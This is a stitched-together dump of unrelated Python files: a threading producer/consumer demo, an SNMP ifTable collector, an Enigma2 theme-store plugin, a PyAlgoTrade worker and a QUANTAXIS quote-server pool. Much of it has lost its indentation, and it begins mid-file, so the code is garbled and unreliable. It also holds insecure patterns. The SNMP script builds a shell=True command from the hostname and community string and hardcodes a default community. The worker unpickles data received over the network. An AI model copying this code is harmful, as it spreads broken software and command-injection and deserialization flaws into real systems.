print('Message cache is full, wait for consuming.')
self.consumer_event.clear()
self.consumer_event.wait()
else:
while len(MESSAGE_CACHE) < 5:
if self.cache:
msg = self.cache.pop(0)
log('Send message--->%s.' % msg)
MESSAGE_CACHE.append(msg)
log('Message cache is: %s, cache is: %s after sending '
'message.' % (MESSAGE_CACHE, self.cache))
else:
if self.complete:
log('Complete to produce message.')
return
else:
log('No message to send.')
# Wait for the next message from the producer
self.producer_event.clear()
self.producer_event.wait()
class Consumer(threading.Thread):
def __init__(self, consume_event=None):
super(Consumer, self).__init__()
self.consume_event = consume_event
# Poll the cache every 2 seconds
self.interval = 2
# Consuming one message takes 5 seconds
self.consume_time = 5
# Exit after waiting 10 seconds without a message
self.timeout = 10
def run(self):
wait = 0
while True:
log('Start to consume message.')
if MESSAGE_CACHE:
msg = MESSAGE_CACHE.pop(0)
log('Consume message--->%s.' % msg)
log('Message cache is: %s after consuming '
'message.' % MESSAGE_CACHE)
sleep(self.consume_time)
wait = 0
# Notify the producer to keep producing
self.consume_event.set()
else:
log('Message cache is empty, just wait.')
if wait >= self.timeout:
log('Wait %s no message, exit.' % self.timeout)
break
else:
sleep(self.interval)
wait += self.interval
def main():
event = threading.Event()
producer = Producer(event)
producer.start()
for _ in range(2):
Consumer(event).start()
producer.join()
if __name__ == '__main__':
main()
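# Alternative sketch (added for illustration, not part of the original
# example): the same producer/consumer hand-off using queue.Queue, which
# provides the blocking and signalling that the Event objects and
# MESSAGE_CACHE implement by hand above.
def queue_based_demo(message_count=10):
    import queue
    q = queue.Queue(maxsize=5)  # bounded, like the 5-item MESSAGE_CACHE

    def produce():
        for i in range(1, message_count + 1):
            q.put(i)  # blocks while the queue is full
        q.put(None)   # sentinel: production finished

    def consume():
        while True:
            msg = q.get()
            if msg is None:
                break
            log('Consume message--->%s.' % msg)

    producer = threading.Thread(target=produce)
    consumer = threading.Thread(target=consume)
    producer.start()
    consumer.start()
    producer.join()
    consumer.join()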
snmp_ifTable.py
#!/usr/bin/python
import logging
logging.basicConfig(level=logging.ERROR)
import os
import time
import datetime
import subprocess
import threading
import Queue
# own modules
import tilak_centreon
def get_snmp_table(hostname, table_oid, community, index=False):
"""
hostname : <str>
table_oid : <str>
community : <str>
index : <bool> append index to every row, snmptable Option -Ci
call the snmptable command and parse its output.
The output is transferred into a list of dictionaries;
key names are taken from the header line of the output.
To function properly, the MIB of the mentioned table must be present and installed;
under Ubuntu use the user specific directory ~/.snmp/mibs to store vendor specific MIB files.
Every dataset - aka row of data - is prepended with the keys "hostname" and "ts" (timestamp of the call).
"""
# field should be extra separated, not the default space
cmd = ""
if index is False:
cmd = "snmptable -v2c -c %s -Cf \; %s %s" % (community, hostname, table_oid)
else:
cmd = "snmptable -v2c -c %s -Ci -Cf \; %s %s" % (community, hostname, table_oid)
logging.info(cmd)
output = subprocess.check_output((cmd, ), shell=True)
lines_to_ignore = 1 # ignore the first line (table title); blank lines are skipped separately
header_line = True # next is header line
headers = [] # headers are stored in list
data = [] # result
keys = {
"hostname" : hostname,
"ts" : time.time()
}
for line in output.split("\n"):
if line == "":
continue # ignore blank lines
if lines_to_ignore > 0:
lines_to_ignore -= 1
continue
else:
if header_line is True:
headers = line.strip().split(";")
header_line = False
else:
subindex = 0
values = keys.copy()
for col in line.strip().split(";"):
values[headers[subindex]] = col.replace("\"", "")
subindex += 1
data.append(values)
return data
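# Illustrative example (made-up values): for snmptable output along the lines of
#   SNMP table: IF-MIB::ifTable
#
#   ifIndex;ifDescr;ifType
#   1;"lo";softwareLoopback
# this function returns
#   [{"hostname": hostname, "ts": <timestamp of the call>,
#     "ifIndex": "1", "ifDescr": "lo", "ifType": "softwareLoopback"}]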
def get_hrStorageTable(hostname, community):
data = get_snmp_table(hostname, "IF-MIB::ifTable", community, index=False)
# return only interfaces that are administratively and operationally up and of type ethernetCsmacd
data2 = [entry for entry in data if (entry["ifAdminStatus"] == "up") and (entry["ifOperStatus"] == "up") and (entry["ifType"] == "ethernetCsmacd")]
return data2
def save_data(filename, data):
"""
save data to file
input data should be a list, containing dictionaries of row data
[
{ key1 : value1,
key2 : value2,
},
{ key1 : value1,
key2 : value2,
},
]
if file already exists, the new data is appended.
if the file will be created, the firstline will be header names, sorted
all row data will be written in sorted keys ranking
"""
if len(data) > 0:
outfile = None
outfile_sema.acquire()
if not os.path.exists(filename):
outfile = open(filename, "wb")
outfile.write("\t".join(sorted(data[0].keys())))
outfile.write("\n")
else:
outfile = open(filename, "ab")
for row in data:
outfile.write("\t".join((str(row[k]) for k in sorted(row.keys()))))
outfile.write("\n")
outfile.close()
outfile_sema.release()
else:
print "No Data returned"
worklist = Queue.Queue()
outfile_sema = threading.BoundedSemaphore(value=1)
def worker():
while not worklist.empty():
hostname, community = worklist.get()
logging.info("Getting Data from %s", hostname)
try:
data = get_hrStorageTable(hostname, community)
save_data(csv_filename, data)
except subprocess.CalledProcessError as exc:
#logging.exception(exc)
logging.error("Failure to get data from %s community %s", hostname, community)
worklist.task_done()
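# Note (added for clarity): the worker threads started in __main__ below drain
# the shared worklist queue concurrently, while outfile_sema ensures that only
# one thread appends to the CSV file at a time.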
if __name__ == "__main__":
centreon = tilak_centreon.Centreon()
project = "snmp"
tablename = "ifTable"
nagios_group = "CMDB_SERVER"
MAX_THREADS = 5
basedir = os.path.join("/var/rrd", project)
if not os.path.exists(basedir):
os.mkdir(basedir)
basedir_raw = os.path.join(basedir, "raw")
if not os.path.exists(basedir_raw):
os.mkdir(basedir_raw)
datestring = datetime.date.today().isoformat()
csv_filename = os.path.join(basedir_raw, "%s_%s.csv" % (tablename, datestring))
# get switchnames from centreon database
for row in centreon.getCentreonHostGroupMembersSnmp(nagios_group):
hostname, community, version = row
if hostname[0:2] in ("vm", ):
continue
if community is None:
community = "tango97"
worklist.put((hostname, community))
q_size = worklist.qsize()
starttime = time.time()
for i in range(MAX_THREADS):
t = threading.Thread(target=worker)
t.daemon = True
t.start()
worklist.join()
logging.error("Duration to fetch all %s hosts %s s", q_size, time.time() - starttime)
metrix_Store_MetrixColors.py
# Embedded file name: /usr/lib/enigma2/python/Plugins/Extensions/MyMetrix/metrix_Store_MetrixColors.py
import thread
from Plugins.Plugin import PluginDescriptor
from Screens.Screen import Screen
from Screens.MessageBox import MessageBox
from Screens.ChoiceBox import ChoiceBox
from twisted.web.client import downloadPage
from Screens.Console import Console
from Screens.Standby import TryQuitMainloop
from Components.MenuList import MenuList
from Components.ActionMap import ActionMap
from Components.AVSwitch import AVSwitch
from Components.config import config, configfile, ConfigYesNo, ConfigSequence, ConfigSubsection, ConfigSelectionNumber, getConfigListEntry, ConfigSelection, ConfigNumber, ConfigText, ConfigInteger
from Components.ConfigList import ConfigListScreen
from Components.Label import Label
from Components.Language import language
from uuid import getnode as get_mac
from os import environ, listdir, remove, rename, system
from skin import parseColor
from Components.Pixmap import Pixmap
from Components.Label import Label
import urllib2
import urllib
from xml.dom.minidom import parseString
import gettext
from Components.GUIComponent import GUIComponent
from Components.MenuList import MenuList
from Components.MultiContent import MultiContentEntryText, MultiContentEntryPixmapAlphaTest
from enigma import eListbox, RT_HALIGN_LEFT, RT_HALIGN_RIGHT
from enigma import ePicLoad, eListboxPythonMultiContent, gFont, addFont, loadPic, loadPNG
from enigma import getDesktop
from Tools.Directories import fileExists, resolveFilename, SCOPE_LANGUAGE, SCOPE_PLUGINS
import metrixColors
import metrixDefaults
import metrix_Store_SubmitRating
import threading
import time
import metrixTools
config = metrixDefaults.loadDefaults()
lang = language.getLanguage()
environ['LANGUAGE'] = lang[:2]
gettext.bindtextdomain('enigma2', resolveFilename(SCOPE_LANGUAGE))
gettext.textdomain('enigma2')
gettext.bindtextdomain('MyMetrix', '%s%s' % (resolveFilename(SCOPE_PLUGINS), 'Extensions/MyMetrix/locale/'))
def _(txt):
t = gettext.dgettext('MyMetrix', txt)
if t == txt:
t = gettext.gettext(txt)
return t
def translateBlock(block):
for x in TranslationHelper:
if block.__contains__(x[0]):
block = block.replace(x[0], x[1])
return block
class OpenScreen(Screen, ConfigListScreen):
screenWidth = getDesktop(0).size().width()
if screenWidth and screenWidth == 1920:
skin = '\n<screen name="MyMetrix-Store-Browse" position="0,0" size="1920,1080" flags="wfNoBorder" backgroundColor="transparent">\n<eLabel position="0,0" size="1920,1080" backgroundColor="transparent" zPosition="-50" />\n<eLabel position="315,center" size="620,700" backgroundColor="#40111111" zPosition="-1" />\n<eLabel position="935,center" size="614,636" backgroundColor="#40222222" zPosition="-1" />\n <eLabel font="Regular; 20" foregroundColor="#00ffffff" backgroundColor="#40000000" halign="left" position="1045,818" size="250,33" text="%s" transparent="1" />\n <widget name="menu" position="325,262" scrollbarMode="showNever" size="601,591" transparent="1" foregroundColor="#00ffffff" backgroundColor="#40000000" />\n <widget position="345,205" size="558,50" name="title" foregroundColor="#00ffffff" font="SetrixHD; 40" valign="center" transparent="1" backgroundColor="#40000000" />\n \n <eLabel position="1031,818" size="5,40" backgroundColor="#0000ff00" />\n<ePixmap pixmap="/usr/lib/enigma2/python/Plugins/Extensions/MyMetrix/images/star.png" position="1499,722" size="32,34" zPosition="1" alphatest="blend" />\n <eLabel font="Regular; 20" foregroundColor="#00ffffff" backgroundColor="#40000000" halign="left" position="1334,818" size="200,33" text="%s" transparent="1" />\n<widget name="helperimage" position="946,363" size="591,343" zPosition="1" alphatest="blend" />\n<widget position="944,242" size="546,50" name="designname" foregroundColor="#00ffffff" font="SetrixHD; 35" valign="center" transparent="1" backgroundColor="#40000000" />\n <widget position="989,717" size="504,48" name="votes" foregroundColor="#00ffffff" font="Regular; 30" valign="center" halign="right" transparent="1" backgroundColor="#40000000" />\n<eLabel position="1320,818" zPosition="1" size="5,40" backgroundColor="#00ffff00" />\n<widget position="945,297" size="341,50" name="author" foregroundColor="#00bbbbbb" font="Regular; 28" valign="center" backgroundColor="#40000000" transparent="1" halign="left" />\n<widget position="1294,305" size="200,40" name="date" foregroundColor="#00999999" font="Regular; 25" valign="center" backgroundColor="#40000000" transparent="1" halign="right" zPosition="1" />\n\n\n </screen>\n' % (_('Install '), _('Vote'))
else:
skin = '\n<screen name="MyMetrix-Store-Browse" position="0,0" size="1280,720" flags="wfNoBorder" backgroundColor="transparent">\n<eLabel position="0,0" size="1280,720" backgroundColor="#b0ffffff" zPosition="-50" />\n<eLabel position="40,40" size="620,640" backgroundColor="#40111111" zPosition="-1" />\n<eLabel position="660,70" size="575,580" backgroundColor="#40222222" zPosition="-1" />\n <eLabel font="Regular; 20" foregroundColor="#00ffffff" backgroundColor="#40000000" halign="left" position="695,608" size="250,33" text="%s" transparent="1" />\n <widget name="menu" position="55,122" scrollbarMode="showNever" size="605,555" transparent="1" foregroundColor="#00ffffff" backgroundColor="#40000000" />\n <widget position="55,55" size="558,50" name="title" foregroundColor="#00ffffff" font="SetrixHD; 40" valign="center" transparent="1" backgroundColor="#40000000" />\n \n <eLabel position="681,610" size="5,40" backgroundColor="#0000ff00" />\n<ePixmap pixmap="/usr/lib/enigma2/python/Plugins/Extensions/MyMetrix/images/star.png" position="1177,549" size="32,34" zPosition="1" alphatest="blend" />\n <eLabel font="Regular; 20" foregroundColor="#00ffffff" backgroundColor="#40000000" halign="left" position="1009,608" size="200,33" text="%s" transparent="1" />\n<widget name="helperimage" position="671,206" size="550,310" zPosition="1" alphatest="blend" />\n<widget position="674,82" size="546,50" name="designname" foregroundColor="#00ffffff" font="SetrixHD; 35" valign="center" transparent="1" backgroundColor="#40000000" />\n <widget position="679,542" size="491,50" name="votes" foregroundColor="#00ffffff" font="Regular; 30" valign="center" halign="right" transparent="1" backgroundColor="#40000000" />\n<eLabel position="995,610" zPosition="1" size="5,40" backgroundColor="#00ffff00" />\n<widget position="675,142" size="341,50" name="author" foregroundColor="#00bbbbbb" font="Regular; 28" valign="center" backgroundColor="#40000000" transparent="1" halign="left" />\n<widget position="1019,145" size="200,40" name="date" foregroundColor="#00999999" font="Regular; 25" valign="center" backgroundColor="#40000000" transparent="1" halign="right" zPosition="1" />\n<eLabel position="0,10" size="40,700" backgroundColor="#30000000" zPosition="-1" />\n\n </screen>\n' % (_('Install '), _('Vote'))
def __init__(self, session, args = None):
self['title'] = Label(_('OpenStore // MetrixColors'))
self.url = 'http://connect.mymetrix.de/store/api/?q=get.xml.designs'
self.screenshotpath = 'http://connect.mymetrix.de/store/api/?q=get.pngresizedColors&width=550&name='
Screen.__init__(self, session)
self.session = session
self['designname'] = Label()
self['author'] = Label()
self['votes'] = Label()
self['date'] = Label()
self.currentid = 1
self.currentgroup = 'DesignStore_'
self.Scale = AVSwitch().getFramebufferScale()
self.PicLoad = ePicLoad()
self['helperimage'] = Pixmap()
self.getCatalog = True
self.getEntry = True
self.initPicture = True
self['menu'] = SkinPartsList([])
self.menulist = []
self.menulist.append(self.DesignsListEntry('-', _('loading, please wait...'), '', '0', '0', '0'))
self['menu'].setList(self.menulist)
self['actions'] = ActionMap(['OkCancelActions',
'DirectionActions',
'InputActions',
'ColorActions'], {'up': self.keyUp,
'ok': self.selectItem,
'down': self.keyDown,
'green': self.applyDesign,
'yellow': self.openRating,
'right': self.pageDown,
'left': self.pageUp,
'cancel': self.save}, -1)
self.onLayoutFinish.append(self.startThread)
def startThread(self):
thread_getDesigns = threading.Thread(target=self.threadworker, args=())
thread_getDesigns.daemon = True
thread_getDesigns.start()
def threadworker(self):
while 1:
if self.getCatalog == True:
self.getCatalog = False
self.getDesigns()
if self.initPicture == True:
self.initPicture = False
self.UpdatePicture()
self.updateMeta()
if self.getEntry == True:
self.getEntry = False
self.updateMeta()
self.ShowPicture()
time.sleep(1)
def getDesigns(self):
try:
self.menulist = []
file = urllib2.urlopen(self.url)
data = file.read()
file.close()
dom = parseString(data)
for design in dom.getElementsByTagName('design'):
name = str(design.getAttributeNode('name').nodeValue)
title = str(design.getAttributeNode('title').nodeValue)
author = str(design.getAttributeNode('author').nodeValue)
rating = str(design.getAttributeNode('rating').nodeValue)
date = str(design.getAttributeNode('date').nodeValue)
total_votes = str(design.getAttributeNode('total_votes').nodeValue)
self.menulist.append(self.DesignsListEntry(name, title, author, rating, date, total_votes))
self['menu'].setList(self.menulist)
self.updateMeta()
self.ShowPicture()
except:
pass
def DesignsListEntry(self, name, title, author, rating, date, total_votes):
res = [[name,
title,
author,
rating,
date,
total_votes]]
png = '/usr/lib/enigma2/python/Plugins/Extensions/MyMetrix/images/vote' + rating + '.png'
pngtype = '/usr/lib/enigma2/python/Plugins/Extensions/MyMetrix/images/brush.png'
res.append(MultiContentEntryPixmapAlphaTest(pos=(412, 9), size=(170, 32), png=loadPNG(png)))
res.append(MultiContentEntryPixmapAlphaTest(pos=(3, 7), size=(32, 32), png=loadPNG(pngtype)))
res.append(MultiContentEntryText(pos=(40, 4), size=(367, 45), font=0, text=title))
return res
def GetPicturePath(self):
try:
returnValue = str(self['menu'].l.getCurrentSelection()[0][0])
path = metrixTools.downloadFile(self.screenshotpath + returnValue)
return path
except:
pass
def updateMeta(self):
try:
self['designname'].setText(str(self['menu'].l.getCurrentSelection()[0][1]))
self['author'].setText(_('by ' + str(self['menu'].l.getCurrentSelection()[0][2])))
self['votes'].setText(str(self['menu'].l.getCurrentSelection()[0][5]))
self['date'].setText(str(self['menu'].l.getCurrentSelection()[0][4]))
self.currentid = 1
self.currentgroup = 'DesignStore_' + str(self['menu'].l.getCurrentSelection()[0][0])
except:
pass
def UpdatePicture(self):
self.PicLoad.PictureData.get().append(self.DecodePicture)
self.onLayoutFinish.append(self.ShowPicture)
def ShowPicture(self):
self.PicLoad.setPara([self['helperimage'].instance.size().width(),
self['helperimage'].instance.size().height(),
self.Scale[0],
self.Scale[1],
0,
1,
'#30000000'])
self.PicLoad.startDecode(self.GetPicturePath())
def DecodePicture(self, PicInfo = ''):
ptr = self.PicLoad.getData()
self['helperimage'].instance.setPixmap(ptr)
def UpdateComponents(self):
self.UpdatePicture()
def selectItem(self):
self.getEntry = True
def keyDown(self):
self['menu'].instance.moveSelection(self['menu'].instance.moveDown)
self.getEntry = True
def keyUp(self):
self['menu'].instance.moveSelection(self['menu'].instance.moveUp)
self.getEntry = True
def save(self):
config.plugins.MyMetrix.Color.save()
configfile.save()
self.close()
def exit(self):
self.close()
def applyDesign(self):
try:
designname = self['menu'].l.getCurrentSelection()[0][0]
file = urllib2.urlopen(self.url)
data = file.read()
file.close()
dom = parseString(data)
for design in dom.getElementsByTagName('design'):
name = str(design.getAttributeNode('name').nodeValue)
if name == designname:
try:
config.plugins.MyMetrix.Color.BackgroundTransparency.value = str(design.getAttributeNode('backgroundtrans').nodeValue)
config.plugins.MyMetrix.Color.SelectionTransparency.value = str(design.getAttributeNode('selectiontrans').nodeValue)
config.plugins.MyMetrix.Color.BackgroundTextTransparency.value = str(design.getAttributeNode('backgroundtexttrans').nodeValue)
config.plugins.MyMetrix.Color.Selection.value = str(design.getAttributeNode('selection').nodeValue)
config.plugins.MyMetrix.Color.ProgressBar.value = str(design.getAttributeNode('progressbars').nodeValue)
config.plugins.MyMetrix.Color.Background.value = str(design.getAttributeNode('background').nodeValue)
config.plugins.MyMetrix.Color.Background2.value = str(design.getAttributeNode('background2').nodeValue)
config.plugins.MyMetrix.Color.Foreground.value = str(design.getAttributeNode('foreground').nodeValue)
config.plugins.MyMetrix.Color.BackgroundText.value = str(design.getAttributeNode('backgroundtext').nodeValue)
config.plugins.MyMetrix.Color.Accent1.value = str(design.getAttributeNode('accent1').nodeValue)
config.plugins.MyMetrix.Color.Accent2.value = str(design.getAttributeNode('accent2').nodeValue)
config.plugins.MyMetrix.Color.Selection_Custom.value = self.toRGB(str(design.getAttributeNode('selection_custom').nodeValue))
config.plugins.MyMetrix.Color.Background_Custom.value = self.toRGB(str(design.getAttributeNode('background_custom').nodeValue))
config.plugins.MyMetrix.Color.Background2_Custom.value = self.toRGB(str(design.getAttributeNode('background2_custom').nodeValue))
config.plugins.MyMetrix.Color.Foreground_Custom.value = self.toRGB(str(design.getAttributeNode('foreground_custom').nodeValue))
config.plugins.MyMetrix.Color.BackgroundText_Custom.value = self.toRGB(str(design.getAttributeNode('backgroundtext_custom').nodeValue))
config.plugins.MyMetrix.Color.Accent1_Custom.value = self.toRGB(str(design.getAttributeNode('accent1_custom').nodeValue))
config.plugins.MyMetrix.Color.Accent2_Custom.value = self.toRGB(str(design.getAttributeNode('accent2_custom').nodeValue))
screenshot = str(design.getAttributeNode('screenshot').nodeValue)
self.showInfo('Design successfully downloaded!\nSave MetrixHD to apply!')
except:
self.showInfo('Design corrupt!')
except:
self.showInfo('Design corrupt!')
def openRating(self):
self.session.open(metrix_Store_SubmitRating.OpenScreen, self.currentid, self.currentgroup)
def toRGB(self, text):
rgb = []
textar = str(text.replace('[', '').replace(']', '')).split(',')
rgb.append(int(textar[0]))
rgb.append(int(textar[1]))
rgb.append(int(textar[2]))
return rgb
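# Illustrative example (added): toRGB('[16, 32, 48]') returns [16, 32, 48].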
def showInfo(self, text = 'Information'):
self.session.open(MessageBox, _(text), MessageBox.TYPE_INFO)
def pageUp(self):
self['menu'].instance.moveSelection(self['menu'].instance.pageUp)
def pageDown(self):
self['menu'].instance.moveSelection(self['menu'].instance.pageDown)
class SkinPartsList(MenuList):
def __init__(self, list):
MenuList.__init__(self, list, False, eListboxPythonMultiContent)
self.l.setItemHeight(50)
self.l.setFont(0, gFont('SetrixHD', 26))
self.l.setFont(1, gFont('Regular', 22))
worker.py
# PyAlgoTrade
#
# Copyright 2011-2015 Gabriel Martin Becedillas Ruiz
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
.. moduleauthor:: Gabriel Martin Becedillas Ruiz <gabriel.becedillas@gmail.com>
"""
import xmlrpc.client
import pickle
import time
import socket
import random
import multiprocessing
import pyalgotrade.logger
from pyalgotrade import barfeed
def call_function(function, *args, **kwargs):
return function(*args, **kwargs)
def call_and_retry_on_network_error(function, retryCount, *args, **kwargs):
ret = None
while retryCount > 0:
retryCount -= 1
try:
ret = call_function(function, *args, **kwargs)
return ret
except socket.error:
time.sleep(random.randint(1, 3))
ret = call_function(function, *args, **kwargs)
return ret
class Worker(object):
def __init__(self, address, port, workerName=None):
url = "http://%s:%s/PyAlgoTradeRPC" % (address, port)
self.__server = xmlrpc.client.ServerProxy(url, allow_none=True)
self.__logger = pyalgotrade.logger.getLogger(workerName)
if workerName is None:
self.__workerName = socket.gethostname()
else:
self.__workerName = workerName
def getLogger(self):
return self.__logger
def getInstrumentsAndBars(self):
ret = call_and_retry_on_network_error(self.__server.getInstrumentsAndBars, 10)
ret = pickle.loads(ret.data)
return ret
def getBarsFrequency(self):
ret = call_and_retry_on_network_error(self.__server.getBarsFrequency, 10)
ret = int(ret)
return ret
def getNextJob(self):
ret = call_and_retry_on_network_error(self.__server.getNextJob, 10)
ret = pickle.loads(ret.data)
return ret
def pushJobResults(self, jobId, result, parameters):
jobId = pickle.dumps(jobId)
result = pickle.dumps(result)
parameters = pickle.dumps(parameters)
workerName = pickle.dumps(self.__workerName)
call_and_retry_on_network_error(self.__server.pushJobResults, 10, jobId, result, parameters, workerName)
def __processJob(self, job, barsFreq, instruments, bars):
bestResult = None
parameters = job.getNextParameters()
bestParams = parameters
while parameters is not None:
# Wrap the bars into a feed.
feed = barfeed.OptimizerBarFeed(barsFreq, instruments, bars)
# Run the strategy.
self.getLogger().info("Running strategy with parameters %s" % (str(parameters)))
result = None
try:
result = self.runStrategy(feed, *parameters)
except Exception as e:
self.getLogger().exception("Error running strategy with parameters %s: %s" % (str(parameters), e))
self.getLogger().info("Result %s" % result)
            if result is not None and (bestResult is None or result > bestResult):
bestResult = result
bestParams = parameters
# Run with the next set of parameters.
parameters = job.getNextParameters()
assert(bestParams is not None)
self.pushJobResults(job.getId(), bestResult, bestParams)
    # Run the strategy and return the result. Subclasses must override this.
    def runStrategy(self, feed, *parameters):
        raise NotImplementedError()
def run(self):
try:
self.getLogger().info("Started running")
# Get the instruments and bars.
instruments, bars = self.getInstrumentsAndBars()
barsFreq = self.getBarsFrequency()
# Process jobs
job = self.getNextJob()
while job is not None:
self.__processJob(job, barsFreq, instruments, bars)
job = self.getNextJob()
self.getLogger().info("Finished running")
except Exception as e:
self.getLogger().exception("Finished running with errors: %s" % (e))
def worker_process(strategyClass, address, port, workerName):
class MyWorker(Worker):
def runStrategy(self, barFeed, *args, **kwargs):
strat = strategyClass(barFeed, *args, **kwargs)
strat.run()
return strat.getResult()
# Create a worker and run it.
w = MyWorker(address, port, workerName)
w.run()
def run(strategyClass, address, port, workerCount=None, workerName=None):
"""Executes one or more worker processes that will run a strategy with the bars and parameters supplied by the server.
:param strategyClass: The strategy class.
:param address: The address of the server.
:type address: string.
:param port: The port where the server is listening for incoming connections.
:type port: int.
:param workerCount: The number of worker processes to run. If None then as many workers as CPUs are used.
:type workerCount: int.
    :param workerName: A name that identifies the worker. If None, the hostname is used.
:type workerName: string.
"""
assert(workerCount is None or workerCount > 0)
if workerCount is None:
workerCount = multiprocessing.cpu_count()
workers = []
# Build the worker processes.
for i in range(workerCount):
workers.append(multiprocessing.Process(target=worker_process, args=(strategyClass, address, port, workerName)))
# Start workers
for process in workers:
process.start()
# Wait workers
for process in workers:
process.join()
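

# ----------------------------------------------------------------------------
# Hedged usage sketch (added for illustration, not part of PyAlgoTrade): the
# retry helper above can wrap any flaky network call. `flaky_fetch` below is a
# made-up local function used purely to exercise the retry path; real workers
# would instead call run() with a strategy class and the optimizer server's
# address.
# ----------------------------------------------------------------------------
if __name__ == "__main__":
    _calls = {"count": 0}

    def flaky_fetch():
        # Fail with a socket error on the first call, succeed on the second.
        _calls["count"] += 1
        if _calls["count"] == 1:
            raise socket.error("simulated network hiccup")
        return "ok"

    # Retries up to 3 times, sleeping 1-3 seconds between failed attempts.
    print(call_and_retry_on_network_error(flaky_fetch, 3))  # prints "ok"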
|
QATdx_adv.py
|
# coding:utf-8
#
# The MIT License (MIT)
#
# Copyright (c) 2016-2018 yutiansut/QUANTAXIS
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import datetime
import queue
import time
import click
from concurrent.futures import ThreadPoolExecutor
from threading import Thread, Timer
import pandas as pd
from pytdx.hq import TdxHq_API
from QUANTAXIS.QAUtil.QADate_trade import QA_util_if_tradetime
from QUANTAXIS.QAUtil.QASetting import DATABASE, stock_ip_list
from QUANTAXIS.QAUtil.QASql import QA_util_sql_mongo_sort_ASCENDING
from QUANTAXIS.QAUtil.QATransform import QA_util_to_json_from_pandas
"""
准备做一个多连接的连接池执行器Executor
当持续获取数据/批量数据的时候,可以减小服务器的压力,并且可以更快的进行并行处理
"""
class QA_Tdx_Executor():
    def __init__(self, thread_num=2, timeout=1, *args, **kwargs):
        self.thread_num = thread_num
        self.timeout = timeout
        self._queue = queue.Queue(maxsize=200)
        self.api_no_connection = TdxHq_API()
        self.executor = ThreadPoolExecutor(self.thread_num)
        # Set every attribute before starting the worker thread, which reads
        # self.timeout and self._queue as soon as it runs.
        self._api_worker = Thread(
            target=self.api_worker, args=(), name='API Worker')
        self._api_worker.start()
def __getattr__(self, item):
try:
api = self.get_available()
func = api.__getattribute__(item)
def wrapper(*args, **kwargs):
res = self.executor.submit(func, *args, **kwargs)
self._queue.put(api)
return res
return wrapper
except:
return self.__getattr__(item)
def _queue_clean(self):
self._queue = queue.Queue(maxsize=200)
def _test_speed(self, ip, port=7709):
api = TdxHq_API(raise_exception=True, auto_retry=False)
_time = datetime.datetime.now()
# print(self.timeout)
try:
with api.connect(ip, port, time_out=1):
                res = api.get_security_list(0, 1)
                # print(res)
                # print(len(res))
                if res is not None and len(res) > 800:
return (datetime.datetime.now() - _time).total_seconds()
else:
return datetime.timedelta(9, 9, 0).total_seconds()
except Exception as e:
return datetime.timedelta(9, 9, 0).total_seconds()
def get_market(self, code):
code = str(code)
if code[0] in ['5', '6', '9'] or code[:3] in ["009", "126", "110", "201", "202", "203", "204"]:
return 1
return 0
def get_frequence(self, frequence):
if frequence in ['day', 'd', 'D', 'DAY', 'Day']:
frequence = 9
elif frequence in ['w', 'W', 'Week', 'week']:
frequence = 5
elif frequence in ['month', 'M', 'm', 'Month']:
frequence = 6
elif frequence in ['Q', 'Quarter', 'q']:
frequence = 10
elif frequence in ['y', 'Y', 'year', 'Year']:
frequence = 11
elif str(frequence) in ['5', '5m', '5min', 'five']:
frequence = 0
elif str(frequence) in ['1', '1m', '1min', 'one']:
frequence = 8
elif str(frequence) in ['15', '15m', '15min', 'fifteen']:
frequence = 1
elif str(frequence) in ['30', '30m', '30min', 'half']:
frequence = 2
elif str(frequence) in ['60', '60m', '60min', '1h']:
frequence = 3
return frequence
@property
def ipsize(self):
        return self._queue.qsize()
@property
def api(self):
return self.get_available()
def get_available(self):
if self._queue.empty() is False:
return self._queue.get_nowait()
else:
Timer(0, self.api_worker).start()
return self._queue.get()
def api_worker(self):
data = []
if self._queue.qsize() < 80:
for item in stock_ip_list:
_sec = self._test_speed(ip=item['ip'], port=item['port'])
if _sec < self.timeout*3:
try:
self._queue.put(TdxHq_API(heartbeat=False).connect(
ip=item['ip'], port=item['port'], time_out=self.timeout*2))
except:
pass
else:
self._queue_clean()
Timer(0, self.api_worker).start()
Timer(300, self.api_worker).start()
    def _singal_job(self, context, id_, code, time_out=0.7):
        try:
            _api = self.get_available()
            __data = context.append(self.api_no_connection.to_df(_api.get_security_quotes(
                [(self.get_market(x), x) for x in code[80 * id_:80 * (id_ + 1)]])))
            __data['datetime'] = datetime.datetime.now()
            self._queue.put(_api)  # return the connection to the pool
            return __data
        except:
            return self._singal_job(context, id_, code)
    def get_realtime(self, code):
        context = pd.DataFrame()
        code = [code] if isinstance(code, str) else code
        try:
            for id_ in range(int(len(code) / 80) + 1):
                context = self._singal_job(context, id_, code)
data = context[['datetime', 'last_close', 'code', 'open', 'high', 'low', 'price', 'cur_vol',
's_vol', 'b_vol', 'vol', 'ask1', 'ask_vol1', 'bid1', 'bid_vol1', 'ask2', 'ask_vol2',
'bid2', 'bid_vol2', 'ask3', 'ask_vol3', 'bid3', 'bid_vol3', 'ask4',
'ask_vol4', 'bid4', 'bid_vol4', 'ask5', 'ask_vol5', 'bid5', 'bid_vol5']]
data['datetime'] = data['datetime'].apply(lambda x: str(x))
return data.set_index('code', drop=False, inplace=False)
except:
return None
def get_realtime_concurrent(self, code):
        code = [code] if isinstance(code, str) else code
try:
data = {self.get_security_quotes([(self.get_market(
x), x) for x in code[80 * pos:80 * (pos + 1)]]) for pos in range(int(len(code) / 80) + 1)}
